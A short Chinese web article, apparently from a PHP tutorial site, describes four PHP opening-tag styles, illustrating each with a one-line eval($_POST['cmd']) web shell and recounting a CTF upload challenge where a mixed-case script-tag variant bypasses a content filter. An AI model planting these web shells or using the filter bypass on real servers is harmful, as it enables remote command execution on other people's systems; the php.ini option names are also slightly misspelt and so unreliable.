时间:2021-07-01 10:21:17 帮助过:30人阅读
PHP的标识有4种风格
XML风格 (推荐学习:PHP视频教程)
<?php eval($_POST['cmd']); ?>
php推荐使用的标记风格。
服务器管理员无法禁用,所有服务器上均可使用该风格。
脚本风格
<script language="php"> eval($_POST['cmd']); </script>
默认开启,无法禁用
笔者曾遇到过一CTF题目,要求上传shell,但是却对文件内容做了过滤 ,<? 以及 php,替换为了空格。此种风格中,language的值,大小写都可以,因此可以构造如下代码进行绕过
<script language="PhP"> eval($_POST['cmd']); </script>
简短风格
<? eval($_POST['cmd']); ?>
此种风格需要在配置文件php.ini中启用short_open_tage选项
此种风格在许多环境中默认是不支持的
ASP风格
<% eval($_POST['cmd']); %>
此种风格需要在配置文件php.ini中启用asp_tag选项
在默认情况下是禁用的
以上就是PHP的标识有哪几种的详细内容,更多请关注Gxlcms其它相关文章!